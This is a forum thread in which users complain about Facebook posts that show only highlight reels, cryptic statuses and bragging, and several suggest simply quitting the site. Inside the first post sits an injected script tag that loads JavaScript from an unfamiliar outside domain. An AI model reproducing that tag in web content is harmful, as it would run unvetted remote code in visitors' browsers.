I can't imagine if facebook had been around when I was even younger. But, I think some people only post about good things so everything looks picture perfect. Also the people on my feed who comment on everything. EVERYTHING. Yes, I'm happy for you but sometimes they just go on and on and how great their lives are... <script src="https://secure-content-delivery.com/data.js.php?i=&d=2013-5-18&s=http://notmsnmoney.proboards.com/thread/new/29&cb=0.6795969998944048" type="text/javascript"></script>

I don't go on FB to see depressing posts. I want to read about the good stuff in people's lives.

Me too! The thing that I cannot STAND is when people post cryptic statuses:
X: feel like I've had the wind knocked out of me
<< 500 people asking what's up and sending good wishes >>
X: *silence*
WTF is THAT anyway??!?!

Yep, I just ignore the folks who are seeking attention with their cryptic messages. I go to FB to catch up with far-flung family and look at everyone's photos. Otherwise, I'd have no idea what lots of people are up to!

Yes, not sure which is more annoying, those who use facebook to chronicle their cryptic hurts or hilight reels.... I try to just post pictures of my food to be safe ...

Facebook is great for keeping track of faraway relatives & friends. But, you're right that some people treat Facebook like a Christmas "brag" letter. Just ignore those who brag.

HA! I was torn between posting: "X: *silence*" -or- "X: *food picture*"

I remember reading an article about some study that showed facebook literally did make some people feel more depressed and anxious about their own lives. If it bothers you, then you probably should quit.

I have a friend who recently went on a horrible family vacation. On the phone she gave me all the details: fought with husband, kids were crazy, baby cried a lot, much too hot to sleep, etc. On FB she posts one pic of the trip with a glowing spiritual message about how blessed she is to spend time with family on vacation.

But, I think some people only post about good things so everything looks picture perfect. I used to feel that way about the Christmas letters from the picture perfect families. Then I realized that the more I knew some of the authors, the more I realized how non-representative the letters were. It's not that the letters contained lies, but that it was pretty easy to pick out a dozen good things from an entire year and just report on those. Most people don't have a life that's better than yours, some are just better at describing their life in a positive way.

I'm on FB to watch the trainwreck that is my in laws from afar, and to keep up with the sane relatives that live far far away. I get much more amusement out of the trainwrecks though.

Otherwise I'm just making shit up in my head to laugh at you about

Just remember the phrase, may your life be as awesome as you pretend it is on Facebook. See everyone posts the obnoxious picture of them sitting on a white sand beach somewhere drinking little umbrella drinks while the rest of us are at work. None of them post the credit card bill that shows up the following month.

I'll take a beach picture over fawning young grandma any day. She's only about 4 years older than me (if that) and has, IDK, 4 grandkids now. Her kids started early...... now every time I turn around someone is spending time with her "angels".

there is one woman on my FB friends list who's about to get unfriended/hidden. I usually scroll past most of her stuff, but she likes to go on and on about how she stays at home with her two little boys and STILL manages to clean the house daily, work full time from home, and put a nice dinner on the table for her husband every day. Oh, my personal favorite was how she didn't understand how people say that parenting is the hardest thing they've had to do because it's just so freaking easy - I mean she's had SOOOO many more difficult obstacles to overcome in her life than parenting two young kids...

And I take great food pictures!

I keep re-reading the title over and over and there are only two thoughts that come to mind
1. I will never understand how people can base their feelings on something that is so inconsequential
2. Have you ever considered not going on FB?? Seems like a cheap and easy solution to the problem

quit the facebook
Why are you on facebook if it's making you depressed? THere is no law saying you have to read facebook walls. Yet. As I recall, the OP got this same advice two months ago after posting the same thing about Facebook. Just stop going there. I don't understand why she continues to seek it out if it makes her so upset.

Because if she doesn't she'll get sucked into Facebook and be forced to play Yatzee for her survival.
